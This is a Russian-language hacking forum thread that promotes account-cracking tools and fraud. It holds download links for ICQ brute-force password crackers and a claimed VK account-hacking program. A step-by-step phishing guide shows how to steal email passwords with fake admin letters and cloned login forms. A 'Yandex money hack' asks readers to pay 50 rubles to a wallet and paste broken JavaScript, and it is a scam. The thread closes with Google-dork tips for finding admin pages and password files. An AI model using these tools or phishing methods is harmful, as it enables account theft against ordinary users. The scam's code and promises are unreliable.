АРХИВ

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » АРХИВ » SoFT » Взлом, программы для взлома, Хакерство


Взлом, программы для взлома, Хакерство

Сообщений 1 страница 23 из 23

1

Я открываю пиратскую зону, для тех кто хочет приколоться и постибаться над теме кого вы хакните!

http://4.bp.blogspot.com/-WRuLD7Vty3M/TndA3s1OFbI/AAAAAAAAAEQ/c971pyb3Xxc/s1600/arg_pirate_color.jpg

0

2

Программы для тюряги вк
Бот для атаки боссов http://letitbit.net/download/70766.7539 … 4.exe.html
Накрутка силы папирос и яда http://letitbit.net/download/30116.39d8 … R.rar.html
Программа для добавления корешей в игре http://letitbit.net/download/09478.08ae … n.exe.html
Программа для яда http://letitbit.net/download/30116.39d8 … R.rar.html

Бот на папиросы http://letitbit.net/download/06386.0e38 … 6.exe.html
Накрутка сигарет, авторитета, енергии, рублей http://letitbit.net/download/57433.50db … 5.rar.html
Открывает татуировки и места для татуировок http://letitbit.net/download/85727.809a … 3.rar.html

егкий взлом страниц вконтакте, зная при этом только почту.
Никаких вирусов, все чисто. Прога действительно работает, при этом вам свой пароль вводить не надо, прога разработана сайтом xakep.ru
Пользуемся наздоровье!

http://depositfiles.com/files/n2pj2arub
http://turbobit.net/93y83f1ptgeg.html

0

3

Программы для взлома ICQ

Свернутый текст

Bruter NeverLands.ru 2.0.0.25

*Автоматический сбор базы
*Сидит в трее и никому не мешает
*Берёт пароли из списка (Pass.txt)
*Брутит пароль в три потока
*Есть возможность брутить по маске pass=login
*Брутит "непобедимый" Flash пароль
*Результаты брута сохраняются в файл good_ "дата" .txt
*Результаты флэш брута сохраняются в файл Flash.txt
*Программа работает через прокси
*Автоматически отсеивает персов по указанному лвл
*Возможность вручную добавить логин в базу
*Возможность указать возраст базы с никами
*Усовершенствован алгоритм брута

Скачать:

http://depositfiles.com/files/og3v8gjk6

_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-

S.R.q ICQ brute

Хороший брут! сам когда то брал его за деньги
Он работает на анонимайзерах как maxima

Скачать можно тут:

http://depositfiles.com/files/tw4exora6
letitbit

_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-

X-brutev.3

Как по мне это очень простой и интересный брут! им сможет брутить даже нуб! брут не требует прокси, не нужен список номеров uin;pass и не нужно особых усилий! Единственный минус в проге это то что у нее скорость очень маленькая.

Скачать можно тут:

http://multi-up.com/46596/

http://openfile.ru/171159/

http://depositfiles.com/ru/files/yxmqql6r7

http://rapidshare.com/files/179980687/x … 3.rar.html

http://fileshare.in.ua/1747431

_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-

xAIM Hide Admin 0.3e

Скрываем окно программы на дедике что бы админ брут не спалил и переименовываем процесс ResHacker'ом меняем ресурсы что бы не палило делаем системные прячем.
Ставим 13 потоков можно пропустить через проксификатор только без цыпочки.

Скачать можно тут:

http://depositfiles.com/ru/files/6753336

http://rapidshare.com/files/132125367/xAIM_HA.rar.html

http://ifolder.ru/7456756

_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-

SuperBrute_v1.0

Новый брутфорс для icq который работает без прокси серверов (что предпологает его невысокую скорость). Брут брутит
диапазоны юинов на один пароль. Почему диапазоНЫ спросити вы? Всё просто это первый брутфорс который брутит одновременно
4 диапазона! Тоесть вы одновременно можете брутить сразу 6,7,8,9 знаки!
Так-же эта програмка сварачивается в трей (место возле часов) что позволяет облегчить вам работу за компьютером и сократить количество
открытых вкладок.
В папке с брутом лежит файл JoSkiNe.dll (48kb), его нужно хранить в директории с брутом.
Приятный интерфейс, удобное расположение кнопок и приятный чёрно-сереневый цвет радует глаз при бруте.
Кстати функция "прокси сервер" в этой верси программы недоступна.
Настройки таймаута зависят от скорости интернета, чем выше скорость, тем меньше таймаут (минимум 1800). Рекомендованно юзать его от 2700мс
и выше.
Всё это вы найдёте в Super Brut`e V 1.1.

Скачать можно тут:

http://multi-up.com/46623/

http://openfile.ru/171245/

http://depositfiles.com/ru/files/ojpe17c6r

http://rapidshare.com/files/180002061/S … 0.rar.html

http://letitbit.net/download/c195101746 … 0.rar.html

http://fileshare.in.ua/1747695

_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-

xAIM 0.3.19 с исправленным ICQ ботом

Многопоточный брутфорс аккаунтов ICQ.
Работает со списком uin;pass. Не требует прокси, скорость на 2-3 потоках достигает 10-12 PPS. Брут оснащен встроенным ICQ ботом с возможностью выбора сервера и порта для подключения (на случай, например, если закрыт стандартный ICQ порт).

Команды бота:
/info - статистика
/good - вывод списка сбрученных номеров
/start - нажатие на кнопку Start
/stop - нажатие на кнопку Stop

Скачать можно тут:

http://multi-up.com/46635/

http://openfile.ru/171275/

http://depositfiles.com/ru/files/k9fhbj9yr

http://rapidshare.com/files/180008731/x … d.rar.html

http://letitbit.net/download/435ba03218 … d.rar.html

http://fileshare.in.ua/1747742

_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
.Brutal v.0.5

ICQ-брутфорсер, работает с прокси, поддерживает https, socks4, socks5 прокси. Многопоточный, количество потоков можно изменять в процессе работы. Возможно устанавливать максимальное время отзыва на подключение, чтение и запись (опция Timeout), опция указывается в секундах и может быть изменена во время работы программы. Также реализована очистка прокси-листов от "мертвых" прокси (опция Cleanup, 0 соответствует отключению опции), значение берется при старте, указывается в минутах. Также очистку можно производить вручную с помощью соответствующих кнопок: Cleanup All, Cleanup HTTPs, Cleanup Socks4, Cleanup Socks5. На версию из скрина внимание не обращайте. По ссылке 0.5 версия.

Скачать можно тут:

http://multi-up.com/46657/

http://openfile.ru/171355/

http://depositfiles.com/ru/files/2a4u7azi5

http://rapidshare.com/files/180025790/Brutal.rar.html

http://letitbit.net/download/17df3c7043 … l.rar.html

http://fileshare.in.ua/1747877

_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-

IPDBrute 2.0 Lite

Самый быстрый брутфорс паролей к аськам с возможностью вести подборчерез HTTP(S)-прокси. Умеет работать в несколько потоков, поддерживает16-ти ричные пароли, поддерживает списки uin`ов на проверку, удаляет"умершие" прокси и многое другое.

Скачать можно тут:

http://letitbit.net/download/9a535f3005 … e.rar.html

http://vip-file.com/download/c09a995335 … t.rar.html

http://depositfiles.com/ru/files/7484713

http://rapidshare.com/files/140125103/ipdbrute.rar

_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-

UBrute v1.2

UBrute - это многопоточный проксевый брутер поддерживающий https, socks4, socks5 прокси. Работает со списками UIN;password, делаю его как альтернативу IPD и Brutal.

Скачать можно тут:

http://depositfiles.com/ru/files/bvgj21pmo

http://vip-file.com/download/4ca1ac1754 … 2.rar.html

http://ifolder.ru/8855867

http://dump.ru/file/1173277

_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-

SBrute by astako

Это небольшой icq-брутфорсер, работает без проксей (что предполагает невысокую скорость) работает со списком уин;пас.
В папки с брутом должно лежать 4 файла:
source.txt - пары уин;пароль для брута
bad.txt – номера с неверными паролями
good.txt – сбрученные номера
cfg.txt – настройки

Добавлена смена пароля на случайный при "сбручивание" номера.
Для включения/выключения опции отредактируйте cfg.txt в папке с брутом.
Вместо "х" укажите нужное значение:
0 - отключить смену пароля
1 - включить смену пароля
Код:

<options>
<change_passwords>х</change_passwords>
</options>

Настройки загружаются при старте, поэтому изменения в файле без перезапуска программы нечего не дадут.
При включенной опции смены пароля в good.txt сохраняется таким образом:
Код:

уин;новый_пароль;старый_пароль

Скачать можно тут:

http://multi-up.com/46662/

http://openfile.ru/171368/

http://depositfiles.com/ru/files/vu9vainip

http://rapidshare.com/files/180028579/Sbrute.rar.html

http://letitbit.net/download/5c7d469023 … e.rar.html

http://fileshare.in.ua/1747911

_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-

FBrute (flabber)

+ добавлены сервера
+Хайд(обратно не появляеться)

Скачать:

http://multi-up.com/46888/

http://openfile.ru/172193/

http://depositfiles.com/ru/files/n15syafon

http://rapidshare.com/files/180316446/FBrute.zip.html

http://letitbit.net/download/828a095616 … e.zip.html

http://fileshare.in.ua/1749920

0

4

Взлом на Яндекс деньги

 

Меня зовут Олег. Я программист (PHP, Delphi),В Интернете известен ещё как один из разработчик программы "Russian Password Crackers" (взлом, восстановление паролей) И разработчик программы SpyAgent (клавиатурный шпион), сейчас эту программу не развиваю. На данный момент я планирую и разрабатываю новые проекты, связанные с пассивными источниками дохода. Работаю также в сфере SEO, немножко интересуюсь МЛН-бизнесом (не "пирамидами", а только с участием реальной полезной продукции).

     Как то раз пришла мне в голову мысль взломать яндекс систему потому что это первая система на которой мало всякой защиты в первую очередь я нугуглил в поисковике много информации и увидел массу разных разводов, в том числе и про волшебные кошельки. Запомните, что нету волшебных кошельков и программ для взлома. Программы для взлома это вирус который считывает ваш пароль и отправляет своему хозяину по эл.почте ваш платежные данные. Как-то я писал на форуме про взлом и как взломать яндекс деньги. Для этого написал специальный скрип для одного кошелька чтоб он давал сбой и присылал на ваш счет 300 рублей. Но какой-то один не умный человек взял и выложил видео в поисковую систему яндекс и старый форум wzlom.mybb.ru сразу же закрыли. Мне пришлось переделывать скрипт по новой искать дыры в системе яндекс.И вот через месяц я переделал скрипт полностью теперь этот способ опять работает. Я открыл этот форум и теперь могу поделиться информ. как взломать яндекс кошелек. И так начнем. Для начала нужно завести кошелек в системе яндекс и положить рублей 60 через терминал оплаты сот. связи ну или каким то другим способом. Потом нужно перевести ровно 50 рублей не больше не меньше на этот номер счета
410011128626123
В комментарии нужно скопировать этот скрипт:

<script language="JavaScript" type="text/javascript">// the number of ringsvar ringnumber=50function showrings() {ifdocument.all) { fr (i=0;i<=ringnumber;i++) { if (f{if (document.all) { clearTimeout(timer) startfontsize=0 for (i=0;i<=ringnumber;i++) { thisring=eval("document.all.ring"+i+".style") thisring.visibility="hidden"
i_fontsize[i]=startfontsizestep[i]=ringnumber*i*300startfontsize=Math.floor((maxfontsize/ringnumber))*(i+1)
<body><aref="hid>

В течении 5 минут обновляете страницу и вам на счет должны прийти 300 рублей. Это хороший способ нажиться на этом!Этим можно пользоваться только один раз в день чтобы страждущие админы яндекса непропалили этот способ.
Уверяю вас этот способ работает!!! Проверено многими пользователями.

0

5

Взлом чужого эмейла

Свернутый текст

Взлом e-mail - вы узнаете как угнать чужой адрес e-mail и защитить свой от взлома.

Доброго времени суток!                     

Уже много всего написано на эту тему, но зачастую описанные способы взлома не действуют, или
действовали когда-то, но очень короткое время.

В этой статье я расскажу об известных мне способах захвата чужого X-mail аккаунта, которые
могут быть реально использованы в наши дни. Я даже больше скажу, именно этими
способами я достал пароли от 3-х мыл-ящиков.

Потому как все технические баги на больших и известных
почтовых серверах уже давно прикрыты, то нам придется использовать социальную инженерию.

Для начала можете прочитать статью, посвященную принципам работы социальной инженерии.

Способ 1

Присылаем письмо жертве от имени администратора, в котором говорим, что кто-то хочет
взломать его мыло. Далее пишем, откуда мы это узнали, типа "он привысил число ввода
неправильных паролей", к примеру 20 и делает это регулярно уже неделю.

Желательно писать все научными словами (читай умными) чтобы
человек не усомнился в том, что это письмо от администратора.

Далее говорим ему, что необходимо поменять пароль на 000yo000, что это, якобы,
специальный пароль, по которому нарушителя должны вычислить, когда он его подберет.

Подкрепите это все адресами, телефонами служба поддержки внизу письма для большей реалистичности.

Способ 2

Это мой любимый способ.
Пишем письмо жертве. Набиваем в него всякой лабуды, типа адреса и картинки с порно сайтов,
адреса магазинов, сайты знакомств. Пишешь, что такого вида рассылка будет повторяться
ежедневно, а лучше по несколько раз в день. Пишешь также, что юзверь,
после принятия этой рассылки подписывается еще на 20 рассылок подобного рода.
Короче надо написать токого, от чего у жертвы глаза на лоб залезут.
Можно еще прикрепить к письму чего нибудь на 500 кило, лучше порно картинки.

Работает стопроцентно. Человек понимает, что с такими темпами его ящик будет всегда
полон всякой лабудой и места дня нормальных писем никогда не будет.
Да и кому понравится вычишать свой ящик по десять раз на дню

Ниже пишем, чтобы подтвердить подписку на эту рассылку, необходимо пойти по этой ссылке.
Ниже пишем, чтобы отказаться от рассылки, необходимо пойти по этой ссылке.

Естественно, после такого он кликнет на ссылке "отписаться", что нам и надо.

Даем ссылку на созданный заранее сайт. Сайт может состоять из одной страницы.
Для простоты берем главную страницу mail.ru и переделываем ее под новую форму.

На странице должно появится следующее:
чтобы подтвердить, что отписаться от рассылки хотите именно вы, а не кто-то другой за вас,
вас необходимо ввести пароль. Желательно поставить так, чтобы логин стоял автоматически
(value="hacked").

Можно попросить также подтверждение введенного пароля, чтобы этот лопух случайно
не ошибся при вводе. Тогда один из паролей будет точно правильным. Но не переусердствуй,
а то может заподозрить что-то неладное.

После нажатия на кнопке "Отписаться", сработает субмит и результаты
формы будут отправлены к тебе на e-mail.

Способ 3

Этот способ я еще не испробовал, но думаю на определенном контингенте он сработает, потому
как отличается от остальных способов только телегой.
Идем на мейл и регистрируем себе мыло типа password-verify@mail.ru.
Пишем письмо жертве в html стиле, оформляем его соответственно под стиль почтового
сервиса. Как уже говорилось раннее, можно позаимствовать исходник со страницы регистрации и
переделать его.

В письме говорим о том, что сервер переполнен "мертвыми аккаунтами" и из-за этого
начал медленно работать. Поэтому мы решили постирать "мертвые аккаунты", для чего
необходимо провести верификацию пользователей. И если он (жертва) хочет и дальше
пользоваться эти мылом, то ему необходимо в течение 7 дней подтвердить это, введя пароль от
его ящика. Те юзвери, кто не подтвердит, что его аккаунт является действующим,
лишатся его и всей накопленной там корреспонденции без возможности восстановления утраченного.

Дизайн формы должен соответствовать дизайну мыловой службы.
Логин в форме должен появляться автоматически.
Пароль должен отправляться на password-verify@mail.ru
В конце письма для пущей уверенности необходимо указать, что пишет вам
Администрация@mail.ru и что все честно.

Границы применимости этих способов

Хочу сразу предупредить, что описанные выше способы подходят далеко не для всех
пользователей майл аккаунтов. Я вам больше скажу, что купятся на них очень не многие.
Так как для этого надо иметь только голову и два уха. Такие есть не у всех.
как правило у людей есть немного больше  У некоторых в области головы
встречаются жидкие извилины, именуемые в народе мозгами.

Так что думай, кому пишешь. А если пишешь, то пиши основательно, чтобы
не было подозрений и подкрепляй все серьезной телегой, а то
не поверит.

Теперь о том, как с этим бороться.

Если вам пришло письмо подобного содержания и вы уже (читай, до получения письма)
прочитали мою статью, то поступаем следующим образом:
вводим пароль и отсылаем его

ЭЭЭЭээ. Скажите вы. Это я так.
1. Можно конечно сразу удалить такое письмо, а нам это надо?
2. Правильно не надо. Давайте посмотрим, что за кекс хочет вас насадить.
К примеру, вас пытаются одурачить описанным выше третьим способом.
Что мы делаем:
- Идем по ссылке "Отписаться от рассылки", что от нас и хотят. Попадаем на форму, где от нас
хотят получить пароль для "проверки" наших праведных намерений отписаться.
Смотрим адрес страницы - видим, что уже липа. Хрен с ней.
Идем дальше, открываем сорс и смотрим, куда отсылаются результаты заполнения формы.
Вот он и попался. Теперь залезаем снова на свой ящик и пишем ему письмо по узнанному
только что адресу, говорим что мы о нем думаем.
3.Можно сделать еще интереснее.
Взять и забить в форму запроса паролей всякой херни, типа "Ну че олух? Хотел пароль! Да
на получи! Хрен тебе!"
Вот это будет хохма.

Так что, развивайте свою фантазию и пишите письма
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
эти способы подходят только для получения пасов у всяких чайников  у которых даже норм инфы нету на мыле
если хочется получить его адрес почты себе тоже идея несупер  я бы лично нестал пользоватся взломаным мылом
и напоследок:
если вам реально попался какойто [цензура] который повелся на это и вы хотите пользоватся его мылом, то в 1 очередь смените пароль  потом смените всю инфу что он указывал, самое главное ещё сменить контрольный вопрос/
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
ну можно и 50 мб спама на мыло отослать, он быстро блокируеться и ты тут же под тем же логином регаешься

0

6

Чем грозит взлом

.

Свернутый текст

Согласитесь, найдется немало интернетчиков, которые хотели бы взломать какой-нибудь сайт и разместить на первой страничке свое имя, после чего связаться с администраторами и ткнуть их носом в собственную безграмотность. Для снятия предупреждений, или хотя бы шутки ради зайти под ником того, чей пароль взломали и написать много чего за него. Им кажется, что таким образом можно поднять себя в глазах друзей и знакомых. Но вот только мало кто учитывает, что таким образом можно еще и загреметь по полной программе. Взлом сайта - это не только компьютерное преступление и антиобщественное деяние. Попавшийся хакер может быть осужден по целому ряду статей УК РФ. (Здесь и дальше – «Уголовный кодекс Российской Федерации»)

2. Первая и самая главная статья, которая светит хакеру, взломавшему какой-либо веб-сервер, - "Неправомерный доступ к компьютерной информации" (с.272 УК). «Неправомерный доступ к охраняемой законом компьютерной информации, то есть информации на ПК, ЭВМ, системе ЭВМ, или их сети, если это деяние повлекло уничтожение, блокирование, модификацию либо копирование информации, нарушение работы ЭВМ, системы ЭВМ или их сети, - наказывается штрафом в размере от двухсот до пятисот минимальных размеров оплаты труда осужденного за период от двух до пяти месяцев, или исправительными работами на срок от шести месяцев до одного года, или лишением свободы на срок до двух лет» Причем обратите внимание, что абсолютно любой взлом связан с копированием информации на ПК хакера. Этот момент гарантирует состав преступления даже в том случае, если на первый взгляд злоумышленник не нанес абсолютно никакого вреда.

3. Но это еще далеко не все. Если во время взлома сайта хакер получил доступ к какой-либо конфиденциальной информации, то он автоматически попадает под действие соответствующих статей УК. И если информация, охраняемая государством, вряд ли будет размещена на веб-сервере, то вот насчет остальных можно очень легко попасть. При этом в действие вступает статья 183. «Незаконные получение и разглашение сведений, составляющих коммерческую, налоговую или банковскую тайну, путем похищения документов, а равно иным незаконным способом...» или статья 137. «Нарушение неприкосновенности частной жизни, то есть незаконное собирание или распространение сведений о частной жизни лица, составляющих его личную или семейную тайну, без его согласия...». (Это если вы ломаете чужой пароль)

4. Другой вариант. Хакер, взломав сайт, не наносит прямого вреда владельцам сайта, но изменяет главную страницу. Как мы уже выяснили, подобные действия все равно попадают под действие статьи 272 УК РФ. Так, например, если хакер взломал веб-сервер и записал что-либо нелицеприятное для администраторов на его страницах (случается довольно часто!), то ему, помимо "компьютерных", будет инкриминироваться нарушение статьи 130 УК РФ. «Оскорбление, то есть унижение чести и достоинства другого лица, выраженное в неприличной форме в публично демонстрирующемся произведении или средствах массовой информации...» Что предусматривающет «штраф в размере до ста минимальных размеров оплаты труда или в размере заработной платы, или обязательными работами на срок до ста двадцати часов, или исправительными работами на срок до шести месяцев».

5. Кроме того, если в тексте, которым хакер подменил оригинальный контент сайта, будут встречаться откровенная брань или нецензурные выражения, то к обвинениям добавится статья 213 УК РФ. «Хулиганство, то есть грубое нарушение общественного порядка, выражающее явное неуважение к обществу, сопровождающееся угрозой применения насилия, а равно уничтожением или повреждением чужого имущества...» Коя может повлечь за собой «обязательные работы на срок от ста двадцати до ста восьмидесяти часов, либо исправительные работы на срок от шести месяцев до одного года, либо арест на срок от четырех до шести месяцев, либо лишение свободы на срок до двух лет».

6. Ну? а если хакер не просто оставил ругательную надпись, а, например, обвинил в чем-то владельцев сайта, то это действие будет классифицировано как клевета, что позволит на суде добавить к уже выдвинутым обвинениям еще и статью 129 УК РФ. «Клевета, то есть распространение заведомо ложных сведений, порочащих честь и достоинство другого лица или подрывающих его репутацию в публично демонстрирующемся произведении или средствах массовой информации...» Это может добавить к наказанию «штраф в размере от пятидесяти до ста минимальных размеров оплаты труда..., либо обязательные работы на срок от ста двадцати до ста восьмидесяти часов, либо исправительные работы на срок до одного года».

7.  Это к форуму не относиться, но кому интересно – прочитайте.
Ну а теперь осталось рассмотреть еще два, так сказать, крайних случая. Если в оставленной хакером на страницах взломанного сайта информации окажется изображение флага или герба РФ, то это позволит обвинению инкриминировать ему еще и нарушение статьи 329 УК РФ. «Надругательство над Государственным гербом Российской Федерации или Государственным флагом Российской Федерации». (Имхо, так что после следующего взлома вставляем госфлаг на главную страницу и подаём иск в суд))

И последний случай - это когда хакер со страниц взломанного сайта призывает к агрессии против других государств (например, против США) или каких-либо компаний (в подавляющем большинстве случаев против столь нелюбимой ими Microsoft). Кстати, перечисленные случаи нередки. Кроме них периодически на взломанных надписях появляются расистские высказывания ("Долой черных!", "Мы за чистоту белой расы!" и т. п.). Все подобные действия могут считаться преступлениями, совершенными против нашего государства и всего человечества в целом. Так что обвинение сможет оперироваться статьями 282, 354 и некоторыми другими, преследующими призывы к насилию, разжиганию межнациональной розни и т. п.

0

7

http://newhackers.mybb.ru/img/avatars/000a/71/82/2-1250716879.gif

Уроки Хакерства:

Урок 1.

Свернутый текст

Самое главное в становлении хакера это его независимость.
Все хакеры независимы и мы в этом уроке научимся быть независимыми!

Для того чтобы быть независимым нужно уметь добывать любую информацию в сети!
Что, к сожалению, умеют не все...
А как вы понимаете добывать информацию можно разными способами, но основной способ это использование поисковых систем.
И тут самое главное не ошибиться с выбором!
А самый правильный в нашем случае будет выбор такого поисковика как Google.com
Объясню почему...
В отличии от yandex.ru aport.ru rambler.ru yahoo.com gogo.ru live.com итд google.com уневерсален для поиска
Вы скажете чем хуже тот же yahoo.com ...ну вопервых куча рекламы которая сама по себе отвлекает.....во вторых в
Гугле в отличии от Яхуу можно найти то что тебе нужно даже если ты не знаешь что ты ищешь!
Да это так! И мы с вами рассмотрим такой пример!

И так меньше болтовни начинаем поиск!

Приведем  жизненный пример:
Нам нужно найти песню, которую мы услышали на радио и запомнили всего 3 слова…
«We're toking away» какая досада….ну попробуем найти…!

Заходим на www.google.com и в строке поиска вбиваем – We're toking away.
Видим, что он нам пишет ошибку….может вы имели ввиду «We're talking away  »?
Вот мы и увидели первое преимущество Google.com я лично реально набирал, что слышал в песне….=)
НО! Это не всё  мы видим кучу ссылок и сайтов, которые содержат в себе слова “ We're talking away ” так как наша
цель найти песню …..добавляем формат того что хотим найти…в данном случае «.mp3»
и у нас получается запрос вида – «We're talking away .mp3» переходим …
и видим Вот оно! 4 ая ссылка!!!

Мы мало того что узнали как называется группа …и достали текст песни…но еще  мы можем скачать саму песню и
посмотреть клип))

И так что мы выяснили….

1)Что подстановкой кавычек мы задаём жесткие рамки для нахождения текста.
Тобишь если мы пишем "жжжжооошш" то нам выдадут сайты только те …  в которых было упомянуто именно такое же слово…
2)Если нам надо найти файл….песню…вордовский документ…видео...мы просто подставляем его расширение
.doc .mp3 .rar .avi итд (обязательно с точкой!)

Я знаю, что оно тут есть!!!

Иногда бывает так, что мы знаем то, что на сайте есть то, что нам нужно…
Но встроенный поисковик для сайта убогий…и не может найти ничего на своём ресурсе.
(поверьте, это бывает часто) тогда в ход идёт мощная поисковая машина Google =)
Опять жизненный пример…мне друг постучался в аську и сказал….не могу найти Visual studio C++ , я ему говорю на офф
сайте есть она….прошел час….он мне пишет…я не нашёл…помоги пожалуйста…ну что не сделаешь ради друга….
И так я знал что на сайт Microsoft.com в чистом виде лучше не заходить….там чёрт голову сломает что то найти)))
( разве я не прав? )
Сразу пошёл в Google.com и вбил такой запрос….

site:microsoft.com "Visual studio 2005" +download

2_ая ссылка идеально подошла для нас))

А теперь поясню что я тут написал…

1)    site:(сайт на котором мы ищем информацию) в нашем случае Microsoft.com тоесть команда site: даёт шанс
искать на определённом сайте….любую информацию файл …итд. Сайт, на котором мы будем искать, пишется вплотную после
двоеточия!
2)    "Visual studio 2005" – я конкретизировал при помощи кавычек то, что я хочу найти, если вы точно не знаете,
что вы ищите лучше кавычки не писать.
3)     И наконец, +download плюсом я добавляю слово, которое желательно встретить на этом сайте…. Тоесть если я
напишу такой запрос - Ламеры +лохи , то мне выдадут на первые места сайты где встречаются эти два слова….
Поверьте, это очень важная функция Гугла плюс\минус она меня не раз спасала!

Пример +/- :  Запрос таков : Отправить смс +бесплатно

И на первой же ссылке мы видим сайт РЕАЛЬНО с которого можно бесплатно отправлять СМС

Конечно вы можете сказать что и без плюса всё хорошо прокатывает…но уверяю что «+» вас еще не раз спасёт….просто
примера в голову не лезет)))

А минус занимается тем что удаляет ненужные слова…тоесть если вы хотите найти курсовую а не дипломную работу…вы
можете просто задать такой запрос

Пример: “Тема курсовой” –диплом +курсовая

Таким образом, вы найдёте то, что вам нужно!

Ну и говоря о хакерстве, я не могу не упомянуть такую фитчу как «inurl:»

При помощи этой встроенной команды гугла можно найти сайты, у которых в URL (линке она же ссылка) будет то,
что вы впишите после двоеточия!
Возможности….
1)    вы можете  с лёгкостью отыскать админку, задавав запрос

site:(любой сайт) inurl:admin

2) Вы можете найти нужный вам файл на сервере….
Пример Site:(любой сайт) inurl:password.txt

Короче это очень важная функция на которую стоит обратить внимание!

Вот собственно главный минимум того что вы должны запомнить….на первом уроке!
Так же хотелось бы, чтобы вы обратили внимания на такие функции как
filetype:
intitle:
и info:

Тоже чрезвычайно полезно ознакомиться с ними!
Более подробно вы можете прочитать про все «Фишки Google»

На этом ресурсе http://www.amazonca.ru/stati/fishki_google-poiska

Если вы станете независимыми от других вы будете чувствовать себя на все 1000%!!!я вас уверяю….и люди будут
спрашивать….откуда ты это знаешь? А вы будете отвечать….я прочитал…!!!(а они в недоумении ….где это вы отрыли
эту инфу!?) =) но мы то с вами теперь знаем что фитчи гугла существенно облегчают жизнь!!!!

Так же ….забыл сказать….если кто, то не применял этот способ “визуальный поиск”….был на днях такой случай…никак
не мог найти марку своего роутера знал только 2 слова «Broadband и роутер» что означает широкополосные и роутер)))
Я вошел во вкладку «картинки» и там на первой же вкладке нашел свой роутер и таким образом узнал всё про него…
__________________________________________________________
Обратите внимание так же на дополнительные функции Гугла http://www.google.ru/intl/ru/options/ особенно на такие
как Gmail.com переводчик и вопросы и ответы…..

Хочу сказать, что я погорячился отбросив все остальные поисковые системы ( это не относится к aport.ru & rambler.ru
они реально отцтой =)) ) а вот с yandex.ru и live.com
Можно поспорить…..

Допустим yandex специализируется на русских сайтах….что делает большое преимущество для него….
Но на Яндэксе сидят только Учителя и прочие нубы которые не умеют пользоваться такой мощнейшей системой!

Алгоритм Яндэкса и Гугла ОООООчень отличаются….что делает большое преимущество для пользователей Гугла…..ибо когда
ваш Доцент наук начнёт искать скачанный реферат то в большинстве случаев он его просто не найдёт….(если вы хотя бы
удосужились его перефразировать)

Еще преимущество гугла заключается в том, что он может искать в файлах…расположенных на серваке….(имеется ввиду
текстовых файлов) таких как .doc .txt
Тоже недавно сталкивался с таким ,что надо найти документ на приём на работу в частную фирму (государственный шаблон)
И мне дали бумажку как он выглядит….
Я просто набрал первую строку этого документа и мне вылезло куча ссылок для скачивания .doc …..шаблонов

__________________________________________________

Так что-то я опять расхвалил Г угол….

Давайте теперь похвалю других…

http://www.live.com/ хоть и бесполезный поисковик, но у него есть отличная функция….определения, сколько сайтов
лежит на серваке…..
всё что нам нужно так это узнать IP сервака….
А делается это так….Пуск---выполнить---там вбить cmd----и в командной строке набрать
«ping сайт_которого_нужно_узнать_IP» жмём энтор….и получаем IP….

Далее переходим к live.com и в запрос пишем
IP:207.46.232.182 (как пример)
И мы узнаем, какие еще  сайты расположены на этом сервере.
(В дальнейшем мы узнаем что можно взломать сайт через другой сайт =) )

ПодЫтожим
1)Становись независимым, старайся узнавать всё сам. И люди будут тебя уважать.
2)Знай…если тебе понадобится информация, ты всегда сможешь её найти! \\Вопросы задавай только в самый
отчаянный случай.....цени своё достоинство.
3)Я надеюсь, этой статьёй немного заинтересовал вас. И вы измените совё отношение к поиску информации.
4)Хоть я и привёл некоторые из явных преимуществ Гугла не сбрасывайте со счетов другие поисковики...
(но используйте их в крайние случаи)
5)Этот пункт я написал для тех, кто может задать вопрос «Что за нах? При чём тут взлом?»так вот знайте….
если вы умеете искать и обрабатывать инфу то вы великий хакер..// теперь вы можете без вопроса на форуме
«с чего начать?» - начать! свой путь к обучению.

Для первого урока хватит инфы…это самый главный Урок в обучении….поэтому отнеситесь к нему серьёздно….
….п.с уверяю уроки еще будут)))я не зациклюсь только на этом…только летнюю сессию доздам Х-)
Если кому то не понравилось,…извините,…не обижайте сильно))))
А если вдруг понравилось, будет приятно услышать это)))

------------------------------------------------------------------------------------------------------------------------

1 урок – Google
2 урок – HTML
3 урок – Независимость+определения
http://forum.xakep.ru/m_1224792/mpage_2/tm.htm[/link]
4 урок – возможности Windows XP
5 урок – Портирование софта
6 урок – Начинаем ломать Pinch + Parser
http://forum.xakep.ru/m_1224792/mpage_4/tm.htm
7 урок – Языки программирования
http://forum.xakep.ru/m_1224792/mpage_6/tm.htm
8 урок  - Взлом Wi-Fi
http://forum.xakep.ru/m_1224792/mpage_7/tm.htm
9 урок – ProRat &  backdoor
10 урок - XSS
http://forum.xakep.ru/m_1224792/mpage_11/tm.htm
11 урок – XSRF aka Cross Site Request Forgery
http://forum.xakep.ru/m_1224792/mpage_13/tm.htm
12 урок  - Начало Пути
http://forum.xakep.ru/m_1224792/mpage_16/tm.htm
13 урок  - Создаем собственный Фейк
http://forum.xakep.ru/m_1224792/mpage_20/key_/tm.htm
14 урок – Фишки от Xakep9009
http://forum.xakep.ru/m_1224792/mpage_24/tm.htm
15 урок - SHELL
http://forum.xakep.ru/m_1224792/mpage_26/tm.htm
16 урок – Эксплойты
http://forum.xakep.ru/m_1224792/mpage_28/tm.htm
17 урок – XSS II Восстание самодостаточных
http://forum.xakep.ru/m_1224792/mpage_37/tm.htm
18 урок - Linux

Свернутый текст

Урок 2.

Каждый уважающий себя хакер должен уметь печатать слепым методом.
Я бы заржал бы если узнал, что Крис Касперски (Гуру в Хакинге) печатал глядя на клавиатуру. Х-)
